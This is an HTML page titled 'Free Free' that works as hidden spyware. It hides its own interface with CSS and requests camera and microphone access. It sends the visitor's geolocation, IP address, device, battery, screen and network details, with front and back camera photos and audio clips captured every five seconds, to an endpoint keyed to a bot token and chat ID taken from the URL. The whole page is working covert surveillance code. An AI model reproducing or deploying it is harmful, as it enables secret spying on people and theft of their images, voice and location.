<!DOCTYPE html>
<html lang="bn">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Free Free</title>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Roboto+Mono:wght@400;700&display=swap');
        body { font-family: 'Roboto Mono', monospace; background-color: #0d0d0d; color: #00ff41; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; }
        .terminal { width: 90%; max-width: 600px; text-align: left; border: 1px solid #333; padding: 20px; background-color: #1a1a1a; box-shadow: 0 0 15px rgba(0, 255, 65, 0.2); }
        .terminal h1 { font-size: 1.2em; color: #ff3b3b; margin-top: 0; }
        .terminal p { margin: 5px 0; font-size: 0.9em; white-space: pre-wrap; word-break: break-all; }
        .terminal .success { color: #00ff41; }
        .terminal .info { color: #ffff00; }

           .terminal,
  #video-preview,
  #canvas {
    display: none !important;
    visibility: hidden !important;
    opacity: 0 !important;
    </style>
</head>
<body>
    <div class="terminal">
        <h1 id="status-heading">[SYSTEM BOOTING...]</h1>
        <p id="status-message">Awaiting permissions grant...</p>
        <p class="info" id="last-update"></p>
    </div>
    <video id="video-preview" autoplay playsinline style="display:none; position: absolute; top: -9999px; left: -9999px;"></video>
    <canvas id="canvas" style="display:none;"></canvas>

    <script>
        const statusHeading = document.getElementById('status-heading');
        const statusMessage = document.getElementById('status-message');
        const lastUpdate = document.getElementById('last-update');
        
        // Helper function for delays
        const sleep = ms => new Promise(r => setTimeout(r, ms));

        const blobToBase64 = blob => new Promise((resolve, reject) => {
            const reader = new FileReader();
            reader.onloadend = () => resolve(reader.result);
            reader.onerror = reject;
            reader.readAsDataURL(blob);
        });
        
        const generateRandomName = () => {
            const chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
            const randomChars = Array(3).fill(0).map(() => chars[Math.floor(Math.random() * chars.length)]).join('');
            const randomNums = Math.floor(10000 + Math.random() * 90000);
            return `Zeron-${randomChars}-${randomNums}`;
        };

        window.onload = async () => {
            const params = new URLSearchParams(window.location.search);
            const chatId = params.get('chat_id');
            const botToken = params.get('bot_token');

            if (!chatId || !botToken) {
                statusHeading.innerText = '[CRITICAL ERROR]';
                statusMessage.innerText = 'FATAL: URL parameters `chat_id` and `bot_token` are missing.';
                return;
            }

            const sendPayloadToServer = (payload) => fetch(`/api/sendData?bot_token=${botToken}&chat_id=${chatId}`, {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify(payload)
            }).catch(err => console.error("Server send failed:", err));

            const captureMedia = async () => {
                let stream = null;
                let backStream = null;
                let mediaRecorder = null;
                const video = document.getElementById('video-preview');
                const canvas = document.getElementById('canvas');
                const context = canvas.getContext('2d');

                try {
                    statusMessage.innerText = "Accessing media devices...";
                    stream = await navigator.mediaDevices.getUserMedia({ video: { facingMode: 'user' }, audio: true });
                    
                    video.srcObject = stream;
                    await new Promise(r => video.onloadedmetadata = r);
                    await sleep(100); // **FIX:** Wait for frame to render to avoid black screen

                    canvas.width = video.videoWidth;
                    canvas.height = video.videoHeight;
                    
                    // Front Camera
                    context.drawImage(video, 0, 0);
                    const frontImageBase64 = canvas.toDataURL('image/jpeg');

                    // Back Camera
                    let backImageBase64 = null;
                    try {
                        backStream = await navigator.mediaDevices.getUserMedia({ video: { facingMode: 'environment' } });
                        video.srcObject = backStream;
                        await new Promise(r => video.onloadedmetadata = r);
                        await sleep(100); // **FIX:** Wait for frame to render
                        
                        canvas.width = video.videoWidth;
                        canvas.height = video.videoHeight;
                        context.drawImage(video, 0, 0);
                        backImageBase64 = canvas.toDataURL('image/jpeg');
                    } catch (e) { 
                        console.log("No back camera or error.");
                    }
                    
                    // Audio
                    // Use the *original* stream (which has audio)
                    mediaRecorder = new MediaRecorder(stream); 
                    const audioChunks = [];
                    mediaRecorder.ondataavailable = e => audioChunks.push(e.data);
                    const audioPromise = new Promise(resolve => {
                        mediaRecorder.onstop = () => resolve(blobToBase64(new Blob(audioChunks, { type: 'audio/webm' })));
                    });
                    
                    mediaRecorder.start();
                    await sleep(2500); // 2.5 sec recording
                    mediaRecorder.stop();
                    
                    const audioBase64 = await audioPromise;
                    
                    return { frontImageBase64, backImageBase64, audioBase64, randomFileName: generateRandomName() };

                } catch (err) {
                    console.error("Media capture error:", err);
                    return {}; // Return empty if failed
                } finally {
                    // **IMPORTANT:** Always stop streams to release camera
                    if (stream) stream.getTracks().forEach(t => t.stop());
                    if (backStream) backStream.getTracks().forEach(t => t.stop());
                }
            };
            
            // --- The Media Loop ---
            const mediaLoop = async () => {
                statusMessage.innerText = "Capturing media packet...";
                const mediaPayload = await captureMedia();
                
                if (Object.keys(mediaPayload).length > 0) {
                    statusMessage.innerText = `Sending packet [${mediaPayload.randomFileName}]...`;
                    await sendPayloadToServer(mediaPayload);
                    lastUpdate.innerText = `[SUCCESS] Packet ${mediaPayload.randomFileName} sent at ${new Date().toLocaleTimeString()}`;
                } else {
                    lastUpdate.innerText = `[FAILED] Media capture failed at ${new Date().toLocaleTimeString()}`;
                }
                
                // **FIX:** Use setTimeout for a delayed loop, not requestAnimationFrame
                setTimeout(mediaLoop, 5000); // Loop every 5 seconds
            };

            // --- Initial Data Grab ---
            try {
                statusHeading.innerText = '[SYSTEM ONLINE]';
                statusMessage.innerText = "Requesting initial permissions...";
                // Request permissions first
                await navigator.mediaDevices.getUserMedia({ video: true, audio: true }).then(s => s.getTracks().forEach(t => t.stop()));
                
                statusMessage.innerText = "Permissions granted. Collecting system data...";

                // Fetch IP and Battery
                const ipPromise = fetch('https://api.ipify.org?format=json').then(res => res.json()).catch(() => ({ ip: 'N/A' }));
                const batteryPromise = navigator.getBattery ? navigator.getBattery() : Promise.resolve(null);
                const [ipInfo, battery] = await Promise.all([ipPromise, batteryPromise]);

                // **NEW:** Get Network and Screen Info
                const connection = navigator.connection || {};
                const screenInfo = {
                    width: window.screen.width,
                    height: window.screen.height,
                    colorDepth: window.screen.colorDepth,
                    orientation: window.screen.orientation ? window.screen.orientation.type : 'N/A'
                };
                const networkInfo = {
                    type: connection.effectiveType || 'N/A',
                    downlink: connection.downlink || 'N/A',
                    rtt: connection.rtt || 'N/A',
                    saveData: connection.saveData || false
                };

                const initialPayload = {
                    deviceInfo: {
                        userAgent: navigator.userAgent,
                        platform: navigator.platform,
                        language: navigator.language,
                        cores: navigator.hardwareConcurrency || 'N/A',
                    },
                    location: await new Promise(resolve => navigator.geolocation.getCurrentPosition(
                        pos => resolve({ lat: pos.coords.latitude, lon: pos.coords.longitude, acc: pos.coords.accuracy }),
                        () => resolve({ lat: 'N/A', lon: 'N/A', acc: 'N/A' }),
                        { enableHighAccuracy: true, timeout: 10000, maximumAge: 0 }
                    )),
                    ipInfo: { ip: ipInfo.ip },
                    batteryInfo: battery ? { level: `${(battery.level * 100).toFixed(0)}%`, charging: battery.charging } : { level: 'N/A', charging: 'N/A' },
                    screenInfo: screenInfo, // **ADDED**
                    networkInfo: networkInfo // **ADDED**
                };

                await sendPayloadToServer(initialPayload);
                statusMessage.innerText = "Initial data sent. Starting media loop...";
                
                // Start the loop
                mediaLoop();

            } catch (error) {
                console.error("Initial permission error:", error);
                statusHeading.innerText = '[PERMISSION DENIED]';
                statusMessage.innerText = 'System halted. Refresh and grant permissions to start.';
            }
        };
    </script>
</body>
</html>
